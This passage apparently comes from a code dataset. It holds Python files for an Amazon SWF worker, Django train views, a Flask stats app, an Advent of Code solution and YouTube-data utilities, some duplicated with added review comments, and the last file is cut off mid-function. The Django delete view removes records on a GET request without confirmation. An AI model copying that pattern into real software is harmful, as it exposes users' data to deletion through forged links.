def _subworkflow_call_key(w_id):
return w_id.split(':')[-1] | flowy/swf/worker.py | import os
import socket
import venusian
from botocore.exceptions import ClientError
from flowy.swf.client import SWFClient, IDENTITY_SIZE
from flowy.swf.decision import SWFActivityDecision
from flowy.swf.decision import SWFWorkflowDecision
from flowy.swf.history import SWFExecutionHistory
from flowy.utils import logger
from flowy.utils import setup_default_logger
from flowy.worker import Worker
__all__ = ['SWFWorkflowWorker', 'SWFActivityWorker']
class SWFWorker(Worker):
def __init__(self):
super(SWFWorker, self).__init__()
self.remote_reg_callbacks = []
def __call__(self, name, version, input_data, decision, *extra_args):
return super(SWFWorker, self).__call__(
(str(name), str(version)), input_data, decision, *extra_args)
def register_remote(self, swf_client, domain):
"""Register or check compatibility of all configs in Amazon SWF."""
for remote_reg_callback in self.remote_reg_callbacks:
# Raises if there are registration problems
remote_reg_callback(swf_client, domain)
def register(self, config, func, version, name=None):
super(SWFWorker, self).register(config, func, (name, version))
def add_remote_reg_callback(self, callback):
self.remote_reg_callbacks.append(callback)
def make_scanner(self):
return venusian.Scanner(
register_task=self.register_task,
add_remote_reg_callback=self.add_remote_reg_callback)
class SWFWorkflowWorker(SWFWorker):
categories = ['swf_workflow']
# Be explicit about what arguments are expected
def __call__(self, name, version, input_data, decision, execution_history):
super(SWFWorkflowWorker, self).__call__(
name, version, input_data, decision, # needed for worker logic
decision, execution_history) # extra_args passed to proxies
def break_loop(self):
"""Used to exit the loop in tests. Return True to break."""
return False
def run_forever(self, domain, task_list,
swf_client=None,
setup_log=True,
register_remote=True,
identity=None):
"""Starts an endless single threaded/single process worker loop.
The worker polls endlessly for new decisions from the specified domain
and task list and runs them.
If reg_remote is set, all registered workflow are registered remotely.
An identity can be set to track this worker in the SWF console,
otherwise a default identity is generated from this machine domain and
process pid.
If setup_log is set, a default configuration for the logger is loaded.
A custom SWF client can be passed in swf_client, otherwise a default
client is used.
"""
if setup_log:
setup_default_logger()
identity = default_identity() if identity is None else identity
swf_client = SWFClient() if swf_client is None else swf_client
if register_remote:
self.register_remote(swf_client, domain)
try:
while 1:
if self.break_loop():
break
name, version, input_data, exec_history, decision = poll_decision(
swf_client, domain, task_list, identity)
self(name, version, input_data, decision, exec_history)
except KeyboardInterrupt:
pass
class SWFActivityWorker(SWFWorker):
categories = ['swf_activity']
# Be explicit about what arguments are expected
def __call__(self, name, version, input_data, decision):
# No extra arguments are used
super(SWFActivityWorker, self).__call__(
name, version, input_data, decision, # needed for worker logic
decision.heartbeat) # extra_args
def break_loop(self):
"""Used to exit the loop in tests. Return True to break."""
return False
def run_forever(self, domain, task_list,
swf_client=None,
setup_log=True,
register_remote=True,
identity=None):
"""Same as SWFWorkflowWorker.run_forever but for activities."""
if setup_log:
setup_default_logger()
identity = default_identity() if identity is None else identity
swf_client = SWFClient() if swf_client is None else swf_client
if register_remote:
self.register_remote(swf_client, domain)
try:
while 1:
if self.break_loop():
break
swf_response = {}
while not swf_response.get('taskToken'):
try:
swf_response = swf_client.poll_for_activity_task(
domain, task_list, identity=identity)
except ClientError:
# add a delay before retrying?
logger.exception('Error while polling for activities:')
at = swf_response['activityType']
decision = SWFActivityDecision(swf_client, swf_response['taskToken'])
self(at['name'], at['version'], swf_response['input'], decision)
except KeyboardInterrupt:
pass
def default_identity():
"""Generate a local identity string for this process."""
identity = "%s-%s" % (socket.getfqdn(), os.getpid())
return identity[-IDENTITY_SIZE:] # keep the most important part
def poll_decision(swf_client, domain, task_list, identity=None):
"""Poll a decision and create a SWFWorkflowContext structure.
:type swf_client: :class:`SWFClient`
:param swf_client: an implementation or duck typing of :class:`SWFClient`
:param domain: the domain containing the task list to poll
:param task_list: the task list from which to poll decision
:param identity: an identity str of the request maker
:rtype: tuple
:returns: a tuple consisting of (name, version, input_data,
:class:'SWFExecutionHistory', :class:`SWFWorkflowDecision`)
"""
first_page = poll_first_page(swf_client, domain, task_list, identity)
token = first_page['taskToken']
all_events = events(swf_client, domain, task_list, first_page, identity)
# Sometimes the first event is on the second page,
# and the first page is empty
first_event = next(all_events)
assert first_event['eventType'] == 'WorkflowExecutionStarted'
wesea = 'workflowExecutionStartedEventAttributes'
assert first_event[wesea]['taskList']['name'] == task_list
task_duration = first_event[wesea]['taskStartToCloseTimeout']
workflow_duration = first_event[wesea]['executionStartToCloseTimeout']
tags = first_event[wesea].get('tagList', None)
child_policy = first_event[wesea]['childPolicy']
name = first_event[wesea]['workflowType']['name']
version = first_event[wesea]['workflowType']['version']
input_data = first_event[wesea]['input']
try:
running, timedout, results, errors, order = load_events(all_events)
except _PaginationError:
# There's nothing better to do than to retry
return poll_decision(swf_client, domain, task_list, identity)
execution_history = SWFExecutionHistory(running, timedout, results, errors, order)
decision = SWFWorkflowDecision(swf_client, token, name, version, task_list,
task_duration, workflow_duration, tags,
child_policy)
return name, version, input_data, execution_history, decision
def poll_first_page(swf_client, domain, task_list, identity=None):
"""Return the response from loading the first page. In case of errors,
empty responses or whatnot retry until a valid response.
:type swf_client: :class:`SWFClient`
:param swf_client: an implementation or duck typing of :class:`SWFClient`
:param domain: the domain containing the task list to poll
:param task_list: the task list from which to poll for events
:param identity: an identity str of the request maker
:rtype: dict[str, str|int|list|dict]
:returns: a dict containing workflow information and list of events
"""
swf_response = {}
while not swf_response.get('taskToken'):
try:
swf_response = swf_client.poll_for_decision_task(domain, task_list,
identity=identity)
except ClientError:
logger.exception('Error while polling for decisions:')
return swf_response
def poll_page(swf_client, domain, task_list, token, identity=None):
"""Return a specific page. In case of errors retry a number of times.
:type swf_client: :class:`SWFClient`
:param swf_client: an implementation or duck typing of :class:`SWFClient`
:param domain: the domain containing the task list to poll
:param task_list: the task list from which to poll for events
:param token: the token string for the requested page
:param identity: an identity str of the request maker
:rtype: dict[str, str|int|list|dict]
:returns: a dict containing workflow information and list of events
"""
for _ in range(7): # give up after a limited number of retries
try:
swf_response = swf_client.poll_for_decision_task(
domain, task_list, identity=identity, next_page_token=token)
break
except ClientError:
logger.exception('Error while polling for decision page:')
else:
raise _PaginationError()
return swf_response
def events(swf_client, domain, task_list, first_page, identity=None):
"""Load pages one by one and generate all events found.
:type swf_client: :class:`SWFClient`
:param swf_client: an implementation or duck typing of :class:`SWFClient`
:param domain: the domain containing the task list to poll
:param task_list: the task list from which to poll for events
:param first_page: the page dict structure from which to start generating
the events, usually the response from :func:`poll_first_page`
:param identity: an identity str of the request maker
:rtype: collections.Iterator[dict[str, int|str|dict[str, int|str|dict]]
:returns: iterator over all of the events
"""
page = first_page
while 1:
for event in page['events']:
yield event
if not page.get('nextPageToken'):
break
page = poll_page(swf_client, domain, task_list, page['nextPageToken'],
identity=identity)
def load_events(event_iter):
"""Combine all events in their order.
This returns a tuple of the following things:
running - a set of the ids of running tasks
timedout - a set of the ids of tasks that have timedout
results - a dictionary of id -> result for each finished task
errors - a dictionary of id -> error message for each failed task
order - an list of task ids in the order they finished
"""
running, timedout = set(), set()
results, errors = {}, {}
order = []
event2call = {}
for event in event_iter:
e_type = event.get('eventType')
if e_type == 'ActivityTaskScheduled':
eid = event['activityTaskScheduledEventAttributes']['activityId']
event2call[event['eventId']] = eid
running.add(eid)
elif e_type == 'ActivityTaskCompleted':
atcea = 'activityTaskCompletedEventAttributes'
eid = event2call[event[atcea]['scheduledEventId']]
result = event[atcea]['result']
running.remove(eid)
results[eid] = result
order.append(eid)
elif e_type == 'ActivityTaskFailed':
atfea = 'activityTaskFailedEventAttributes'
eid = event2call[event[atfea]['scheduledEventId']]
reason = event[atfea]['reason']
running.remove(eid)
errors[eid] = reason
order.append(eid)
elif e_type == 'ActivityTaskTimedOut':
attoea = 'activityTaskTimedOutEventAttributes'
eid = event2call[event[attoea]['scheduledEventId']]
running.remove(eid)
timedout.add(eid)
order.append(eid)
elif e_type == 'ScheduleActivityTaskFailed':
satfea = 'scheduleActivityTaskFailedEventAttributes'
eid = event[satfea]['activityId']
reason = event[satfea]['cause']
# when a job is not found it's not even started
errors[eid] = reason
order.append(eid)
elif e_type == 'StartChildWorkflowExecutionInitiated':
scweiea = 'startChildWorkflowExecutionInitiatedEventAttributes'
eid = _subworkflow_call_key(event[scweiea]['workflowId'])
running.add(eid)
elif e_type == 'ChildWorkflowExecutionCompleted':
cwecea = 'childWorkflowExecutionCompletedEventAttributes'
eid = _subworkflow_call_key(
event[cwecea]['workflowExecution']['workflowId'])
result = event[cwecea]['result']
running.remove(eid)
results[eid] = result
order.append(eid)
elif e_type == 'ChildWorkflowExecutionFailed':
cwefea = 'childWorkflowExecutionFailedEventAttributes'
eid = _subworkflow_call_key(
event[cwefea]['workflowExecution']['workflowId'])
reason = event[cwefea]['reason']
running.remove(eid)
errors[eid] = reason
order.append(eid)
elif e_type == 'ChildWorkflowExecutionTimedOut':
cwetoea = 'childWorkflowExecutionTimedOutEventAttributes'
eid = _subworkflow_call_key(
event[cwetoea]['workflowExecution']['workflowId'])
running.remove(eid)
timedout.add(eid)
order.append(eid)
elif e_type == 'StartChildWorkflowExecutionFailed':
scwefea = 'startChildWorkflowExecutionFailedEventAttributes'
eid = _subworkflow_call_key(event[scwefea]['workflowId'])
reason = event[scwefea]['cause']
errors[eid] = reason
order.append(eid)
elif e_type == 'TimerStarted':
eid = event['timerStartedEventAttributes']['timerId']
running.add(eid)
elif e_type == 'TimerFired':
eid = event['timerFiredEventAttributes']['timerId']
running.remove(eid)
results[eid] = None
return running, timedout, results, errors, order
class _PaginationError(Exception):
"""Can't retrieve the next page after X retries."""
def _subworkflow_call_key(w_id):
return w_id.split(':')[-1] | 0.621656 | 0.103386 |
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.core.mail import message
from django.core.paginator import Paginator
from django.shortcuts import render
from django.urls import reverse_lazy
from django.views.generic import DetailView, CreateView, UpdateView, DeleteView, ListView
from trains.forms import TrainForm
from trains.models import Train
def home(request):
qs = Train.objects.all()
paginator = Paginator(qs, 3)
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
context = {'page_obj': page_obj}
return render(request, 'trains/home.html', context)
class TrainListView(ListView):
paginate_by = 5
model = Train
template_name = 'trains/home.html'
class TrainDetailView(DetailView):
queryset = Train.objects.all()
template_name = 'trains/detail.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
form = TrainForm
context['form'] = form
return context
class TrainCreateView(SuccessMessageMixin, LoginRequiredMixin, CreateView):
model = Train
form_class = TrainForm
template_name = 'trains/create.html'
success_url = reverse_lazy('trains:home')
success_message = 'Поезд успешно создан'
class TrainUpdateView(SuccessMessageMixin, LoginRequiredMixin, UpdateView):
model = Train
form_class = TrainForm
template_name = 'trains/update.html'
success_url = reverse_lazy('trains:home')
success_message = 'Поезд успешно отредактирован'
class TrainDeleteView(SuccessMessageMixin, LoginRequiredMixin, DeleteView):
model = Train
success_url = reverse_lazy('trains:home')
# template_name = 'cities/delete.html' # страница подтверждения
def get(self, request, *args, **kwargs):
"""Удаление без подтверждения"""
messages.success(request, 'Поезд удален')
return self.post(request, *args, **kwargs) | src/trains/views.py | from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.core.mail import message
from django.core.paginator import Paginator
from django.shortcuts import render
from django.urls import reverse_lazy
from django.views.generic import DetailView, CreateView, UpdateView, DeleteView, ListView
from trains.forms import TrainForm
from trains.models import Train
def home(request):
qs = Train.objects.all()
paginator = Paginator(qs, 3)
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
context = {'page_obj': page_obj}
return render(request, 'trains/home.html', context)
class TrainListView(ListView):
paginate_by = 5
model = Train
template_name = 'trains/home.html'
class TrainDetailView(DetailView):
queryset = Train.objects.all()
template_name = 'trains/detail.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
form = TrainForm
context['form'] = form
return context
class TrainCreateView(SuccessMessageMixin, LoginRequiredMixin, CreateView):
model = Train
form_class = TrainForm
template_name = 'trains/create.html'
success_url = reverse_lazy('trains:home')
success_message = 'Поезд успешно создан'
class TrainUpdateView(SuccessMessageMixin, LoginRequiredMixin, UpdateView):
model = Train
form_class = TrainForm
template_name = 'trains/update.html'
success_url = reverse_lazy('trains:home')
success_message = 'Поезд успешно отредактирован'
class TrainDeleteView(SuccessMessageMixin, LoginRequiredMixin, DeleteView):
model = Train
success_url = reverse_lazy('trains:home')
# template_name = 'cities/delete.html' # страница подтверждения
def get(self, request, *args, **kwargs):
"""Удаление без подтверждения"""
messages.success(request, 'Поезд удален')
return self.post(request, *args, **kwargs) | 0.40439 | 0.084606 |
import base64
from decimal import Decimal
import gettext
import hashlib
import os.path
import flask
import werkzeug.routing
import werkzeug.utils
from api import api
from player import player
from root import root
from sql import db_connect, db_init, get_db, put_db
class DefaultConfig:
DATABASE = "postgresql:///trends"
TIMEOUT = 60000
def json_default(obj):
if isinstance(obj, Decimal):
return str(obj)
raise TypeError("Object of type '{}' is not JSON serializable" \
.format(type(obj).__name__))
def create_app():
app = flask.Flask(__name__)
app.config.from_object(DefaultConfig)
app.config.from_envvar('CONFIG', silent=True)
app.teardown_appcontext(put_db)
app.add_template_filter(any)
app.add_template_filter(all)
app.jinja_options['trim_blocks'] = True
app.jinja_options['lstrip_blocks'] = True
app.jinja_env.policies["json.dumps_kwargs"] = { 'default': json_default }
app.jinja_env.globals.update(zip=zip)
app.jinja_env.add_extension('jinja2.ext.do')
app.jinja_env.add_extension('jinja2.ext.i18n')
app.jinja_env.install_null_translations(newstyle=True)
app.register_blueprint(root)
app.register_blueprint(player, url_prefix='/player/<int:steamid>')
app.register_blueprint(api, url_prefix='/api/v1')
return app
application = create_app()
@application.template_filter('duration')
def duration_filter(timestamp):
mm, ss = divmod(timestamp, 60)
hh, mm = divmod(mm, 60)
if hh:
return "{:.0f}:{:02.0f}:{:02.0f}".format(hh, mm, ss)
else:
return "{:.0f}:{:02.0f}".format(mm, ss)
@application.template_filter('avatar')
def avatar_filter(hash, size='full'):
if not hash:
return ''
url = "https://steamcdn-a.akamaihd.net/steamcommunity/public/images/avatars/{}/{}{}.jpg"
return url.format(hash[:2], hash, {
'small': '',
'medium': '_medium',
'full': '_full',
}[size])
@application.template_filter()
def anynone(iterable):
for item in iterable:
if item is None:
return False
return True
application.static_cache = {}
@application.url_defaults
def foo(endpoint, values):
if endpoint != 'static' or 'filename' not in values:
return
filename = werkzeug.utils.safe_join(application.static_folder, values['filename'])
if not os.path.isfile(filename):
return
mtime, hash = application.static_cache.get(filename, (None, None))
if mtime == os.path.getmtime(filename):
values['h'] = hash
return
hash = hashlib.md5()
with open(filename, 'rb') as file:
hash.update(file.read())
hash = base64.urlsafe_b64encode(hash.digest())[:10]
application.static_cache[filename] = (mtime, hash)
values['h'] = hash
if __name__ == '__main__':
application.run() | trends.py |
import base64
from decimal import Decimal
import gettext
import hashlib
import os.path
import flask
import werkzeug.routing
import werkzeug.utils
from api import api
from player import player
from root import root
from sql import db_connect, db_init, get_db, put_db
class DefaultConfig:
DATABASE = "postgresql:///trends"
TIMEOUT = 60000
def json_default(obj):
if isinstance(obj, Decimal):
return str(obj)
raise TypeError("Object of type '{}' is not JSON serializable" \
.format(type(obj).__name__))
def create_app():
app = flask.Flask(__name__)
app.config.from_object(DefaultConfig)
app.config.from_envvar('CONFIG', silent=True)
app.teardown_appcontext(put_db)
app.add_template_filter(any)
app.add_template_filter(all)
app.jinja_options['trim_blocks'] = True
app.jinja_options['lstrip_blocks'] = True
app.jinja_env.policies["json.dumps_kwargs"] = { 'default': json_default }
app.jinja_env.globals.update(zip=zip)
app.jinja_env.add_extension('jinja2.ext.do')
app.jinja_env.add_extension('jinja2.ext.i18n')
app.jinja_env.install_null_translations(newstyle=True)
app.register_blueprint(root)
app.register_blueprint(player, url_prefix='/player/<int:steamid>')
app.register_blueprint(api, url_prefix='/api/v1')
return app
application = create_app()
@application.template_filter('duration')
def duration_filter(timestamp):
mm, ss = divmod(timestamp, 60)
hh, mm = divmod(mm, 60)
if hh:
return "{:.0f}:{:02.0f}:{:02.0f}".format(hh, mm, ss)
else:
return "{:.0f}:{:02.0f}".format(mm, ss)
@application.template_filter('avatar')
def avatar_filter(hash, size='full'):
if not hash:
return ''
url = "https://steamcdn-a.akamaihd.net/steamcommunity/public/images/avatars/{}/{}{}.jpg"
return url.format(hash[:2], hash, {
'small': '',
'medium': '_medium',
'full': '_full',
}[size])
@application.template_filter()
def anynone(iterable):
for item in iterable:
if item is None:
return False
return True
application.static_cache = {}
@application.url_defaults
def foo(endpoint, values):
if endpoint != 'static' or 'filename' not in values:
return
filename = werkzeug.utils.safe_join(application.static_folder, values['filename'])
if not os.path.isfile(filename):
return
mtime, hash = application.static_cache.get(filename, (None, None))
if mtime == os.path.getmtime(filename):
values['h'] = hash
return
hash = hashlib.md5()
with open(filename, 'rb') as file:
hash.update(file.read())
hash = base64.urlsafe_b64encode(hash.digest())[:10]
application.static_cache[filename] = (mtime, hash)
values['h'] = hash
if __name__ == '__main__':
application.run() | 0.462473 | 0.06767 |
class ListNode:
def __init__(self, data=None, next=None, prev=None):
self.data = data
self.next = next
self.prev = prev
def __repr__(self):
return repr(self.data)
class CircularDoublyLinkedList:
def __init__(self, list):
# Keep track of all the nodes to save look-up time
self.nodes = {}
# Head
self.head = ListNode(data=list[0], next=list[0], prev=list[0])
prev = self.head
self.nodes[list[0]] = self.head
# Load data
for data in list[1:]:
new = ListNode(data=data, prev=prev)
self.nodes[data] = new
prev.next = new
prev = new
new.next = self.head
self.head.prev = new
def __repr__(self):
nodes = []
curr = self.head
while curr:
nodes.append(repr(curr))
curr = curr.next
if curr == self.head:
break
return "[" + ", ".join(nodes) + "]"
def find(self, key):
return self.nodes.get(key, None)
def remove(self, start_node, length=1):
# build a circular sublist
end_node = start_node
removed_head = bool(start_node == self.head)
for _ in range(length - 1):
end_node = end_node.next
if end_node == self.head:
removed_head = True
if removed_head:
self.head = end_node.next
# tie the ends of the remaining of the original list
start_node.prev.next = end_node.next
end_node.next.prev = start_node.prev
return (start_node, start_node.next, end_node)
def insert_after(self, node, start_node, end_node):
node.next.prev = end_node
end_node.next = node.next
node.next = start_node
start_node.prev = node
def solve(cups, n_rounds):
curr = cups.head
for _ in range(n_rounds):
start_remove = curr.next
to_remove = cups.remove(start_remove, length=3)
removed_values = [node.data for node in to_remove]
destination = curr.data
while True:
destination = (destination - 1) % (n_cups + 1)
if destination in removed_values:
continue
elif destination > 0:
destination_node = cups.find(destination)
break
cups.insert_after(destination_node, to_remove[0], to_remove[-1])
curr = curr.next
node = cups.find(1)
result = 1
for _ in range(2):
node = node.next
result *= node.data
return result
n_cups = 1000000
n_rounds = 10000000
with open("day23.txt", "r") as f:
data = list(map(int, list(f.read().strip())))
data.extend(range(len(data) + 1, n_cups + 1))
cups = CircularDoublyLinkedList(data)
print(solve(cups, n_rounds)) | 2020/day23-2.py | class ListNode:
def __init__(self, data=None, next=None, prev=None):
self.data = data
self.next = next
self.prev = prev
def __repr__(self):
return repr(self.data)
class CircularDoublyLinkedList:
    """Circular doubly linked list with an O(1) value->node index (`self.nodes`).

    Assumes all values are distinct (they are used as dict keys).
    """
    def __init__(self, list):
        # NOTE(review): parameter name shadows the builtin `list`; assumes
        # len(list) >= 2 — with a single element the loop never runs and
        # `new` below is unbound.
        # Keep track of all the nodes to save look-up time
        self.nodes = {}
        # Head
        # NOTE(review): next/prev are seeded with the raw value list[0]
        # (not a node); they are overwritten at the end of __init__.
        self.head = ListNode(data=list[0], next=list[0], prev=list[0])
        prev = self.head
        self.nodes[list[0]] = self.head
        # Load data
        for data in list[1:]:
            new = ListNode(data=data, prev=prev)
            self.nodes[data] = new
            prev.next = new
            prev = new
        # Close the circle: last node links back to the head.
        new.next = self.head
        self.head.prev = new
    def __repr__(self):
        # Walk the circle once, stopping when we arrive back at the head.
        nodes = []
        curr = self.head
        while curr:
            nodes.append(repr(curr))
            curr = curr.next
            if curr == self.head:
                break
        return "[" + ", ".join(nodes) + "]"
    def find(self, key):
        """Return the node holding `key`, or None (O(1) dict lookup)."""
        return self.nodes.get(key, None)
    def remove(self, start_node, length=1):
        """Detach `length` consecutive nodes beginning at `start_node`.

        Returns the tuple (start_node, start_node.next, end_node).
        NOTE(review): this triple only enumerates every removed node when
        length == 3, which is the only way solve() calls it.
        """
        # build a circular sublist
        end_node = start_node
        removed_head = bool(start_node == self.head)
        for _ in range(length - 1):
            end_node = end_node.next
            if end_node == self.head:
                removed_head = True
        if removed_head:
            # Keep head valid by moving it just past the removed span.
            self.head = end_node.next
        # tie the ends of the remaining of the original list
        start_node.prev.next = end_node.next
        end_node.next.prev = start_node.prev
        return (start_node, start_node.next, end_node)
    def insert_after(self, node, start_node, end_node):
        """Splice the sublist start_node..end_node back in right after `node`."""
        node.next.prev = end_node
        end_node.next = node.next
        node.next = start_node
        start_node.prev = node
def solve(cups, n_rounds):
    """Play `n_rounds` of the AoC 2020 day-23 cup game on the circular list
    `cups` and return the product of the two cup labels following cup 1.

    NOTE(review): relies on the module-level global `n_cups` for the wrap-around
    arithmetic — confirm it always equals the number of cups in `cups`.
    """
    curr = cups.head
    for _ in range(n_rounds):
        # Detach the three cups clockwise of the current cup.
        start_remove = curr.next
        to_remove = cups.remove(start_remove, length=3)
        removed_values = [node.data for node in to_remove]
        destination = curr.data
        while True:
            # Labels are 1-based; the modulo wraps label 1 around to n_cups.
            destination = (destination - 1) % (n_cups + 1)
            if destination in removed_values:
                continue
            elif destination > 0:
                destination_node = cups.find(destination)
                break
        cups.insert_after(destination_node, to_remove[0], to_remove[-1])
        curr = curr.next
    # Answer: product of the two labels immediately clockwise of cup 1.
    node = cups.find(1)
    result = 1
    for _ in range(2):
        node = node.next
        result *= node.data
    return result
# Part-2 puzzle scale: one million cups, ten million rounds.
n_cups = 1000000
n_rounds = 10000000
with open("day23.txt", "r") as f:
    # Input is a single line of digit labels, e.g. "389125467".
    data = list(map(int, list(f.read().strip())))
# Pad the initial labelling out to n_cups with ascending labels.
data.extend(range(len(data) + 1, n_cups + 1))
cups = CircularDoublyLinkedList(data)
print(solve(cups, n_rounds)) | 0.690559 | 0.351395 |
import pickle
import plotly.express as px
import numpy as np
import gspread_dataframe as gd
import pandas as pd
from scipy.spatial.distance import pdist, squareform
def get_raw_data(context):
    """Download all non-taken-down rows of yt_api_data_v7 from BigQuery,
    de-duplicated on video_id (first occurrence kept).

    Args:
        context: dict with 'bq_client' and 'bq_storage_client' entries.

    Returns:
        pandas.DataFrame of unique videos; prints a warning when duplicate
        rows were dropped.
    """
    _query = '''
    SELECT
        *
    FROM
        `moz-fx-data-shared-prod.regrets_reporter_analysis.yt_api_data_v7`
    WHERE
        takedown = FALSE
    '''
    data = context['bq_client'].query(
        _query
    ).result(
    ).to_dataframe(
        bqstorage_client=context['bq_storage_client']
    )
    total_rows = len(data)
    data.drop_duplicates(subset="video_id", keep='first',
                         inplace=True, ignore_index=True)
    unique_rows = len(data)
    if total_rows != unique_rows:
        print(
            f"Warning: raw table has {total_rows - unique_rows} duplicate rows or {100 * (total_rows - unique_rows) / unique_rows}%.")
    return data
def update_from_raw_data(data, context):
    """Fetch rows of yt_api_data_v7 whose video_id is not already in `data`.

    Returns `data` with the new rows appended, or `data` unchanged (with a
    printed warning) when nothing new arrived. Does not mutate `data`.
    """
    _query = '''
    SELECT
        *
    FROM
        `moz-fx-data-shared-prod.regrets_reporter_analysis.yt_api_data_v7`
    WHERE
        takedown = FALSE
    '''
    new_data = context['bq_client'].query(
        _query
    ).result(
    ).to_dataframe(
        bqstorage_client=context['bq_storage_client']
    ).loc[lambda d: ~ d.video_id.isin(data.video_id)]
    if len(new_data) > 0:
        return pd.concat([data, new_data])
    else:
        print("Warning: no new data acquired.")
        return data
def save_data(data, pickle_file, context):
    """Pickle `data` to <gdrive_path>/<pickle_file> using the highest protocol."""
    target = context['gdrive_path'] + pickle_file
    with open(target, 'wb') as out:
        pickle.dump(data, out, protocol=pickle.HIGHEST_PROTOCOL)
def load_data(pickle_file, context):
    """Unpickle and return the object stored at <gdrive_path>/<pickle_file>."""
    path = context['gdrive_path'] + pickle_file
    with open(path, 'rb') as src:
        return pickle.load(src)
def plot_similarity_matrix(m):
    """Render matrix `m` as a 1600x800 plotly heatmap figure and return it."""
    fig = px.imshow(m, width=1600, height=800)
    fig.update_layout(
        margin=dict(l=20, r=20, t=20, b=20),
        paper_bgcolor="LightSteelBlue",
    )
    return fig
def get_indices_of_k_largest(arr, k):
    """Return (row, col) index arrays of the `k` largest entries strictly above
    the main diagonal of the square matrix `arr`.

    BUG FIX: the original overwrote the caller's array in place (NaN-ing the
    diagonal and lower triangle); this version works on a float copy, which
    also generalizes the function to integer-typed input.

    Entries are returned in no particular order (argpartition is unordered).
    """
    work = arr.astype(float, copy=True)
    # Mask the diagonal and lower triangle so only i < j pairs compete.
    work[np.tril_indices(work.shape[0], 0)] = np.nan
    # NaNs sort last under argpartition, so the first k slots are the k largest.
    idx = np.argpartition((-work).ravel(), k)
    return tuple(np.array(np.unravel_index(idx, work.shape))[:, range(min(k, 0), max(k, 0))])
def prep_videovote_sheet(data, pairs, tab, context, existing=None):
    """Build an A/B video-comparison table and upload it to "Videovote backend".

    Args:
        data: DataFrame with title/channel/description/video_id columns.
        pairs: (left_indices, right_indices) positional index arrays.
        tab: worksheet name to create (reused if it already exists).
        context: dict providing 'gspread_client'.
        existing: optional collection of (id_a, id_b) tuples to skip.
    """
    left = data.iloc[pairs[0]].reset_index()
    right = data.iloc[pairs[1]].reset_index()
    vvdata = pd.DataFrame({
        "title_a": left.title,
        "channel_a": left.channel,
        "description_a": left.description,
        "id_a": left.video_id,
        "title_b": right.title,
        "channel_b": right.channel,
        "description_b": right.description,
        "id_b": right.video_id,
        "vote": None,
    })
    # Canonicalise each pair so that id_a < id_b.
    # BUG FIX: the original mutated the row copies yielded by iterrows(),
    # which never writes back to the DataFrame; swap via .loc instead.
    a_cols = ["title_a", "channel_a", "description_a", "id_a"]
    b_cols = ["title_b", "channel_b", "description_b", "id_b"]
    swap = vvdata["id_a"] > vvdata["id_b"]
    vvdata.loc[swap, a_cols + b_cols] = vvdata.loc[swap, b_cols + a_cols].values
    if existing is not None:  # BUG FIX: `!= None` is ambiguous for array-likes
        vvdata = vvdata[[(r.id_a, r.id_b) not in existing
                         for _, r in vvdata.iterrows()]]
    ss = context['gspread_client'].open("Videovote backend")
    try:
        ws = ss.add_worksheet(tab, rows=len(vvdata), cols="9")
    except Exception:
        # Worksheet already exists -- reuse it.
        ws = ss.worksheet(tab)
    gd.set_with_dataframe(ws, vvdata.reset_index(
        drop=True), include_index=False)
def init_eval_pickle(name, context):
    """Create (or overwrite) the eval pickle at <gdrive_path>/<name> as an empty dict."""
    path = context['gdrive_path'] + name
    with open(path, 'wb') as out:
        pickle.dump({}, out, protocol=pickle.HIGHEST_PROTOCOL)
def update_eval_data(eval_data, sheet, context):
    """Merge votes from worksheet `sheet` of "Videovote backend" into `eval_data`.

    `eval_data` maps (id_a, id_b) -> list of votes; new votes are appended.
    Returns the mapping (mutated in place).
    """
    ws = context['gspread_client'].open("Videovote backend").worksheet(sheet)
    # Drop fully-empty columns and rows that gspread pads the sheet with.
    new_eval_data = gd.get_as_dataframe(ws).dropna(
        axis=1, how='all').dropna(how='all')
    for i, r in new_eval_data.iterrows():
        key = (r.id_a, r.id_b)
        if key in eval_data:
            eval_data[key] = eval_data[key] + [r.vote]
        else:
            eval_data[key] = [r.vote]
    return eval_data
def get_equality_matrix(data, part):
    """Pairwise equality matrix for column `part` of `data`.

    Entry (i, j) is 1 when the two values are equal, else 0 (despite going
    through pdist, this is a similarity, not a distance; the diagonal is 0
    because squareform leaves it zeroed).
    """
    values = [[v] for v in data[part]]
    condensed = pdist(values, lambda a, b: 1 if a == b else 0)
    return squareform(condensed)
def print_data_diagnostics(data):
n = len(data)
print(f"Data is length {n}")
nt = len(data[data.transcript.str.len() > 0])
print(f"With transcripts: {nt}")
possible_parts = ["title", "transcript", "description", "thumbnail"]
possible_types = ["embedding", "entities"]
dups = len(data[data.video_id.duplicated()])
if dups != 0:
print(f"Warning! {dups} dupes detected.")
for part in possible_parts:
ap_n = nt if part == "transcript" else n
for type in possible_types:
if f"{part}_{type}" in data:
nv = data[f"{part}_{type}"].isnull().sum()
print(
f"Data has {part}_{type} for {n-nv} rows or {(n-nv)/ap_n * 100}%") | semanticdist/utils.py | import pickle
import plotly.express as px
import numpy as np
import gspread_dataframe as gd
import pandas as pd
from scipy.spatial.distance import pdist, squareform
def get_raw_data(context):
_query = '''
SELECT
*
FROM
`moz-fx-data-shared-prod.regrets_reporter_analysis.yt_api_data_v7`
WHERE
takedown = FALSE
'''
data = context['bq_client'].query(
_query
).result(
).to_dataframe(
bqstorage_client=context['bq_storage_client']
)
total_rows = len(data)
data.drop_duplicates(subset="video_id", keep='first',
inplace=True, ignore_index=True)
unique_rows = len(data)
if total_rows != unique_rows:
print(
f"Warning: raw table has {total_rows - unique_rows} duplicate rows or {100 * (total_rows - unique_rows) / unique_rows}%.")
return data
def update_from_raw_data(data, context):
_query = '''
SELECT
*
FROM
`moz-fx-data-shared-prod.regrets_reporter_analysis.yt_api_data_v7`
WHERE
takedown = FALSE
'''
new_data = context['bq_client'].query(
_query
).result(
).to_dataframe(
bqstorage_client=context['bq_storage_client']
).loc[lambda d: ~ d.video_id.isin(data.video_id)]
if len(new_data) > 0:
return pd.concat([data, new_data])
else:
print("Warning: no new data acquired.")
return data
def save_data(data, pickle_file, context):
with open(context['gdrive_path'] + pickle_file, 'wb') as handle:
pickle.dump(data, handle,
protocol=pickle.HIGHEST_PROTOCOL)
def load_data(pickle_file, context):
